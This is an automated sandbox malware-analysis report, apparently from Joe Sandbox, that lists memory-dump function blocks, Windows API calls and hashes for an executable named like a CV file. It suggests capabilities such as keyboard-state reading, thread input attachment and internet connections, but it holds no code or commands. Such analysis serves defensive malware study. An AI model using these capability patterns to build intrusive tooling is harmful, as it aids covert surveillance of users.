                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: KeyboardState$InputMessagePostSend
                                                                                            • String ID:
                                                                                            • API String ID: 432972143-0
                                                                                            • Opcode ID: 5ac9cc9f45c607ecdd433c2f94c93293b93e989b91222db004351040f930fc29
                                                                                            • Instruction ID: 3c5db45c7652d2b0c1c98aca4597c86030108eb4fd84ff2410fa93b50c2458cb
                                                                                            • Opcode Fuzzy Hash: 5ac9cc9f45c607ecdd433c2f94c93293b93e989b91222db004351040f930fc29
                                                                                            • Instruction Fuzzy Hash: FD312630A40258AEEF248B64C819BFE7BBD9B56318F04415AF4D1A72D1CBF48F85D761
                                                                                            APIs
                                                                                            • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 000F4038
                                                                                            • __isleadbyte_l.LIBCMT ref: 000F4066
                                                                                            • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 000F4094
                                                                                            • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 000F40CA
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                            • String ID:
                                                                                            • API String ID: 3058430110-0
                                                                                            • Opcode ID: b41b934ba85c6c7ac3a34f4e7d22712335c8e70bfa56dff4238b8b5a22360fd9
                                                                                            • Instruction ID: f6b895e03ec8c8a8d6cd04011b57cf852e84478a4cdb3069665d19b721599a17
                                                                                            • Opcode Fuzzy Hash: b41b934ba85c6c7ac3a34f4e7d22712335c8e70bfa56dff4238b8b5a22360fd9
                                                                                            • Instruction Fuzzy Hash: 8531AF3160024AEFDB219F65C844BBB7BE5BF41310F154428EF659B9A1EB31D890EB90
                                                                                            APIs
                                                                                            • GetForegroundWindow.USER32 ref: 00127CB9
                                                                                              • Part of subcall function 00105F55: GetWindowThreadProcessId.USER32(?,00000000), ref: 00105F6F
                                                                                              • Part of subcall function 00105F55: GetCurrentThreadId.KERNEL32 ref: 00105F76
                                                                                              • Part of subcall function 00105F55: AttachThreadInput.USER32(00000000,?,0010781F), ref: 00105F7D
                                                                                            • GetCaretPos.USER32(?), ref: 00127CCA
                                                                                            • ClientToScreen.USER32(00000000,?), ref: 00127D03
                                                                                            • GetForegroundWindow.USER32 ref: 00127D09
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                            • String ID:
                                                                                            • API String ID: 2759813231-0
                                                                                            • Opcode ID: a8a6b95aa1dca3d3df9fbd0db2ee663a0411ce6df6f6b3b61caee7d0b9213991
                                                                                            • Instruction ID: 43e2dd10907056d7267e885102ac968e9abc105f9a6ec07c9057b6d0476d151d
                                                                                            • Opcode Fuzzy Hash: a8a6b95aa1dca3d3df9fbd0db2ee663a0411ce6df6f6b3b61caee7d0b9213991
                                                                                            • Instruction Fuzzy Hash: 43311E75900208AFDB00EFA5D8459EFFBF9EF54314B108466E815E3211DB319E458FA0
                                                                                            APIs
                                                                                              • Part of subcall function 000DB34E: GetWindowLongW.USER32(?,000000EB), ref: 000DB35F
                                                                                            • GetCursorPos.USER32(?), ref: 0012F211
                                                                                            • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0013E4C0,?,?,?,?,?), ref: 0012F226
                                                                                            • GetCursorPos.USER32(?), ref: 0012F270
                                                                                            • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,0013E4C0,?,?,?), ref: 0012F2A6
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                                            • String ID:
                                                                                            • API String ID: 2864067406-0
                                                                                            • Opcode ID: 32769e833b25aa874ed2f7d75a47ba61754f82c6d99e50cce7db02a76a30a392
                                                                                            • Instruction ID: 51372ef0d761a4c6ff52712ff5cfa3379674673c44c508e5d6fa27d816d13645
                                                                                            • Opcode Fuzzy Hash: 32769e833b25aa874ed2f7d75a47ba61754f82c6d99e50cce7db02a76a30a392
                                                                                            • Instruction Fuzzy Hash: 42218039600128EFCB159F94E858EEE7BB9EF0A750F144079F9054B6A1D7309EA2DB60
                                                                                            APIs
                                                                                            • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00114358
                                                                                              • Part of subcall function 001143E2: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00114401
                                                                                              • Part of subcall function 001143E2: InternetCloseHandle.WININET(00000000), ref: 0011449E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: Internet$CloseConnectHandleOpen
                                                                                            • String ID:
                                                                                            • API String ID: 1463438336-0
                                                                                            • Opcode ID: f22dbf59bd49ed8fa4bcbd9071b208b4ed78f01e570a674214bf07474ea4e0ac
                                                                                            • Instruction ID: ca92376be5cdee8a4f3f55752f5ca1a5448df5a198ed415bd7b0cf270965bd4a
                                                                                            • Opcode Fuzzy Hash: f22dbf59bd49ed8fa4bcbd9071b208b4ed78f01e570a674214bf07474ea4e0ac
                                                                                            • Instruction Fuzzy Hash: F521F635200611BFEB199F60DC01FFBB7A9FF58B15F00402AFA6596650D77198A1A790
                                                                                            APIs
                                                                                            • GetWindowLongW.USER32(?,000000EC), ref: 00128AA6
                                                                                            • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00128AC0
                                                                                            • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00128ACE
                                                                                            • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00128ADC
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$Long$AttributesLayered
                                                                                            • String ID:
                                                                                            • API String ID: 2169480361-0
                                                                                            • Opcode ID: a6b6c1802073f6848ebaf52bf351bde3e39f66889c4251c0dd28520459a295bb
                                                                                            • Instruction ID: afa66601bc8abe3dc41ba16d3308cfc69d50e021aae00d1a7bb18ce64fa28a32
                                                                                            • Opcode Fuzzy Hash: a6b6c1802073f6848ebaf52bf351bde3e39f66889c4251c0dd28520459a295bb
                                                                                            • Instruction Fuzzy Hash: 50119331306521AFDB04AB14EC15FBE7799AF95320F18411AF916C72E2CF70AC508B94
                                                                                            APIs
                                                                                            • select.WSOCK32(00000000,00000001,00000000,00000000,?), ref: 00118AE0
                                                                                            • __WSAFDIsSet.WSOCK32(00000000,00000001), ref: 00118AF2
                                                                                            • accept.WSOCK32(00000000,00000000,00000000), ref: 00118AFF
                                                                                            • WSAGetLastError.WSOCK32(00000000), ref: 00118B16
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLastacceptselect
                                                                                            • String ID:
                                                                                            • API String ID: 385091864-0
                                                                                            • Opcode ID: 37441d92ad969ee7a2c6c8fb231aea1a28bdb82fb63903ad3725794213113a61
                                                                                            • Instruction ID: 985d2c34e203a7974b07681b835a0d67188393319985bd9f1b31d803b8f76b47
                                                                                            • Opcode Fuzzy Hash: 37441d92ad969ee7a2c6c8fb231aea1a28bdb82fb63903ad3725794213113a61
                                                                                            • Instruction Fuzzy Hash: 7B21C672A001249FCB14DF68DC84ADEBBECEF5A314F00816AF849D7291DB749D818F90
                                                                                            APIs
                                                                                              • Part of subcall function 00101E68: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00100ABB,?,?,?,0010187A,00000000,000000EF,00000119,?,?), ref: 00101E77
                                                                                              • Part of subcall function 00101E68: lstrcpyW.KERNEL32(00000000,?,?,00100ABB,?,?,?,0010187A,00000000,000000EF,00000119,?,?,00000000), ref: 00101E9D
                                                                                              • Part of subcall function 00101E68: lstrcmpiW.KERNEL32(00000000,?,00100ABB,?,?,?,0010187A,00000000,000000EF,00000119,?,?), ref: 00101ECE
                                                                                            • lstrlenW.KERNEL32(?,00000002,?,?,?,?,0010187A,00000000,000000EF,00000119,?,?,00000000), ref: 00100AD4
                                                                                            • lstrcpyW.KERNEL32(00000000,?,?,0010187A,00000000,000000EF,00000119,?,?,00000000), ref: 00100AFA
                                                                                            • lstrcmpiW.KERNEL32(00000002,cdecl,?,0010187A,00000000,000000EF,00000119,?,?,00000000), ref: 00100B2E
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: lstrcmpilstrcpylstrlen
                                                                                            • String ID: cdecl
                                                                                            • API String ID: 4031866154-3896280584
                                                                                            • Opcode ID: f29ace4cf10ea2ed68c93ad8985fcbdf866d84402da264558bc46eba12d9f196
                                                                                            • Instruction ID: 2332d43e13d0d24f7cbeb8fb42c8555fd4b19e7603cd0c6090ceed6ff7f571d5
                                                                                            • Opcode Fuzzy Hash: f29ace4cf10ea2ed68c93ad8985fcbdf866d84402da264558bc46eba12d9f196
                                                                                            • Instruction Fuzzy Hash: 83119A3A100305AFDB15AF24DC45E7A77A8FF49354F80406AF946CB290EBB19851C7A1
                                                                                            APIs
                                                                                            • _free.LIBCMT ref: 000F2FB5
                                                                                              • Part of subcall function 000E395C: __FF_MSGBANNER.LIBCMT ref: 000E3973
                                                                                              • Part of subcall function 000E395C: __NMSG_WRITE.LIBCMT ref: 000E397A
                                                                                              • Part of subcall function 000E395C: RtlAllocateHeap.NTDLL(01910000,00000000,00000001,00000001,00000000,?,?,000DF507,?,0000000E), ref: 000E399F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: AllocateHeap_free
                                                                                            • String ID:
                                                                                            • API String ID: 614378929-0
                                                                                            • Opcode ID: 3f74a5b56dd9da090f18164e651551b1ce98e6b9853afb45b7221c6ed1c0fd71
                                                                                            • Instruction ID: 4bfdefe45e18afc26d81bb68f00e83c7948e64a5acaaa0aaa5d7428ebe740a5d
                                                                                            • Opcode Fuzzy Hash: 3f74a5b56dd9da090f18164e651551b1ce98e6b9853afb45b7221c6ed1c0fd71
                                                                                            • Instruction Fuzzy Hash: F211EB7150825AAFCB313F71AC146BD3BD8AF04370F204539FA0DE6562DF30C940A690
                                                                                            APIs
                                                                                            • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 001005AC
                                                                                            • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 001005C7
                                                                                            • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 001005DD
                                                                                            • FreeLibrary.KERNEL32(?), ref: 00100632
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: Type$FileFreeLibraryLoadModuleNameRegister
                                                                                            • String ID:
                                                                                            • API String ID: 3137044355-0
                                                                                            • Opcode ID: dce40da9714c4e54f2857e494135696bb7eb4f0786537d490017e41033b1ccd1
                                                                                            • Instruction ID: 0e53a69b1bc69a7f7379b43406ca370127351748fbf6ae50dbc08ecde3a2c194
                                                                                            • Opcode Fuzzy Hash: dce40da9714c4e54f2857e494135696bb7eb4f0786537d490017e41033b1ccd1
                                                                                            • Instruction Fuzzy Hash: FA21B471940208EFDB228F90EC88BDABBB9EF44700F00846DE59692190DBB1EA54DF51
                                                                                            APIs
                                                                                            • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00106733
                                                                                            • _memset.LIBCMT ref: 00106754
                                                                                            • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 001067A6
                                                                                            • CloseHandle.KERNEL32(00000000), ref: 001067AF
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseControlCreateDeviceFileHandle_memset
                                                                                            • String ID:
                                                                                            • API String ID: 1157408455-0
                                                                                            • Opcode ID: 96c5725771acb8eebf3684f6e22804a604c8b6b03ebc16ab3a1f7f2ce3373e81
                                                                                            • Instruction ID: a4739d014cd2f067eb05e9c7e6aa8af4873250b78e4511ac8aa6af55393fc1be
                                                                                            • Opcode Fuzzy Hash: 96c5725771acb8eebf3684f6e22804a604c8b6b03ebc16ab3a1f7f2ce3373e81
                                                                                            • Instruction Fuzzy Hash: 8A11CAB59012287AE7205BA5AC4DFEBBABCEF45B64F10419AF504E71D0D7744E808B64
                                                                                            APIs
                                                                                              • Part of subcall function 000FAA62: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 000FAA79
                                                                                              • Part of subcall function 000FAA62: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 000FAA83
                                                                                              • Part of subcall function 000FAA62: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 000FAA92
                                                                                              • Part of subcall function 000FAA62: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 000FAA99
                                                                                              • Part of subcall function 000FAA62: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 000FAAAF
                                                                                            • GetLengthSid.ADVAPI32(?,00000000,000FADE4,?,?), ref: 000FB21B
                                                                                            • GetProcessHeap.KERNEL32(00000008,00000000), ref: 000FB227
                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 000FB22E
                                                                                            • CopySid.ADVAPI32(?,00000000,?), ref: 000FB247
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: Heap$AllocInformationProcessToken$CopyErrorLastLength
                                                                                            • String ID:
                                                                                            • API String ID: 4217664535-0
                                                                                            • Opcode ID: 222d869c17e2955fe574c557fffed2f65253d2bea994f755074d75de2cfb2690
                                                                                            • Instruction ID: e4c761589a223899961000552233805eec7ae8422aaee8c4355abf2478b97140
                                                                                            • Opcode Fuzzy Hash: 222d869c17e2955fe574c557fffed2f65253d2bea994f755074d75de2cfb2690
                                                                                            • Instruction Fuzzy Hash: 3211C475A00209EFCF549F54DC84ABEB7E9EF85304F18802DEA4697611D7319E44EF10
                                                                                            APIs
                                                                                            • SendMessageW.USER32(?,000000B0,?,?), ref: 000FB498
                                                                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 000FB4AA
                                                                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 000FB4C0
                                                                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 000FB4DB
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSend
                                                                                            • String ID:
                                                                                            • API String ID: 3850602802-0
                                                                                            • Opcode ID: 06a1fa90a1845a9ec430b69e1bc7562c87688bb0c4b24e4a232c79d77739dab2
                                                                                            • Instruction ID: 3c83a8c8963171803a458a32ff0b247dac281f22078238a5db10efc6e51f725f
                                                                                            • Opcode Fuzzy Hash: 06a1fa90a1845a9ec430b69e1bc7562c87688bb0c4b24e4a232c79d77739dab2
                                                                                            • Instruction Fuzzy Hash: 53112A7A900218FFDB11DFA9C985EADBBB4FB08710F204091E604B7295D771AE11EB94
                                                                                            APIs
                                                                                              • Part of subcall function 000DB34E: GetWindowLongW.USER32(?,000000EB), ref: 000DB35F
                                                                                            • DefDlgProcW.USER32(?,00000020,?,00000000), ref: 000DB5A5
                                                                                            • GetClientRect.USER32(?,?), ref: 0013E69A
                                                                                            • GetCursorPos.USER32(?), ref: 0013E6A4
                                                                                            • ScreenToClient.USER32(?,?), ref: 0013E6AF
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: Client$CursorLongProcRectScreenWindow
                                                                                            • String ID:
                                                                                            • API String ID: 4127811313-0
                                                                                            • Opcode ID: 84db3b66d3b76b4b8d3dcb5fa25144a04a109b66ae46d13119bc23f08360c1a9
                                                                                            • Instruction ID: 8d76919203c3c3daed8ed3891a743c0470c4539f87d5081642c013adf30703fd
                                                                                            • Opcode Fuzzy Hash: 84db3b66d3b76b4b8d3dcb5fa25144a04a109b66ae46d13119bc23f08360c1a9
                                                                                            • Instruction Fuzzy Hash: C0113676900229FBCF10DF94E8469EE7BB8EB09304F110452F941E7651D730AA92CBB1
                                                                                            APIs
                                                                                            • GetCurrentThreadId.KERNEL32 ref: 00107352
                                                                                            • MessageBoxW.USER32(?,?,?,?), ref: 00107385
                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 0010739B
                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 001073A2
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                                            • String ID:
                                                                                            • API String ID: 2880819207-0
                                                                                            • Opcode ID: 3d5430719ebdd2f49570c3de3c91300e9ba35f558e60f4d36b9fd4c32ef72d6c
                                                                                            • Instruction ID: 6b1fee6f1a672da386eb5b0ac185e0d3840dd35921241d278bedb63070307b93
                                                                                            • Opcode Fuzzy Hash: 3d5430719ebdd2f49570c3de3c91300e9ba35f558e60f4d36b9fd4c32ef72d6c
                                                                                            • Instruction Fuzzy Hash: 53110476E04204BFDB119FA8EC09E9E7BAEAB45720F044355F921D32E1D7B09E4087A0
                                                                                            APIs
                                                                                            • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 000DD1BA
